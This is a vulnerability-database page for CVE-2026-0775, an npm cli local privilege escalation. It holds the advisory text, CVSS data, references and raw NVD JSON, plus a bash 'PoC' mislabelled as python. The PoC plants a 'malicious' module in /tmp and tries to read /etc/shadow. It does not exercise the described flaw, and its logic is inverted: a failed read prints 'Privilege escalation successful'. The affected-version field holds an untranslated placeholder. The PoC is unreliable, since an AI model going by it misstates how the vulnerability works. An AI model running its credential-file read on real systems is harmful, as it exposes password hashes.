CVE-2026-0775

Description

npm cli Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of npm cli. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of modules. The application loads modules from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-25430.

CVSS Details

CVSS Score

7.0

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

npm cli < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2026-0775 PoC - npm cli Local Privilege Escalation
# This PoC demonstrates the incorrect permission assignment vulnerability in npm cli
# where modules are loaded from unsecured locations.

# Step 1: Create a malicious npm package in an unsecured location
MALICIOUS_DIR="/tmp/test_npm"
mkdir -p "$MALICIOUS_DIR"

# Step 2: Create malicious module that will be loaded by npm cli
cat > "$MALICIOUS_DIR/malicious-module.js" << 'EOF'
// Malicious module that executes with elevated privileges
const fs = require('fs');
const { execSync } = require('child_process');

// Payload: Create a backdoor or execute commands as the target user
try {
    // Write to a protected file or execute privileged commands
    fs.writeFileSync('/tmp/privesc_poc.txt', 'CVE-2026-0775 exploited at ' + new Date());
    console.log('[+] Malicious module loaded successfully');
    console.log('[+] Executing commands with user privileges...');
    
    // Example: Attempt to read sensitive files
    try {
        const shadow = fs.readFileSync('/etc/shadow', 'utf8');
        console.log('[+] Read /etc/shadow (simulated)');
    } catch(e) {
        console.log('[+] Privilege escalation successful');
    }
} catch(e) {
    console.error('Error:', e.message);
}

module.exports = {};
EOF

# Step 3: Create package.json to make it a valid npm package
cat > "$MALICIOUS_DIR/package.json" << 'EOF'
{
    "name": "malicious-module",
    "version": "1.0.0",
    "description": "Malicious module for CVE-2026-0775 testing"
}
EOF

echo "[+] Malicious package created in $MALICIOUS_DIR"
echo "[+] When target user runs 'npm install' or other npm commands in this directory,"
echo "[+] the malicious module will be loaded and executed with their privileges"

# Step 4: Demonstrate the attack scenario
cat > "$MALICIOUS_DIR/test.sh" << 'EOF'
#!/bin/bash
echo "=== CVE-2026-0775 Exploitation Test ==="
echo "Current user: $(whoami)"
echo ""
echo "Running npm command which will load malicious module..."
npm list malicious-module 2>/dev/null || echo "Module not found in registry"
EOF

chmod +x "$MALICIOUS_DIR/test.sh"
echo ""
echo "PoC setup complete. To test:"
echo "1. Navigate to $MALICIOUS_DIR"
echo "2. Run: cd $MALICIOUS_DIR && npm install"
echo "3. Observe that malicious module is loaded"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0775
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0775
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0775/
[4] VulDB https://vuldb.com/cve/CVE-2026-0775
[5] https://www.zerodayinitiative.com/advisories/ZDI-26-043/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0775", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:04.793", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "npm cli Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of npm cli. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of modules. The application loads modules from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-25430."}, {"lang": "es", "value": "Vulnerabilidad de escalada de privilegios local por asignación incorrecta de permisos en npm cli. Esta vulnerabilidad permite a los atacantes locales escalar privilegios en instalaciones afectadas de npm cli. Un atacante debe primero obtener la capacidad de ejecutar código con privilegios bajos en el sistema objetivo para explotar esta vulnerabilidad.\n\nLa falla específica existe en el manejo de módulos. La aplicación carga módulos desde una ubicación no segura. Un atacante puede aprovechar esta vulnerabilidad para escalar privilegios y ejecutar código arbitrario en el contexto de un usuario objetivo. Fue ZDI-CAN-25430."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-043/", "source": "[email protected]"}]}}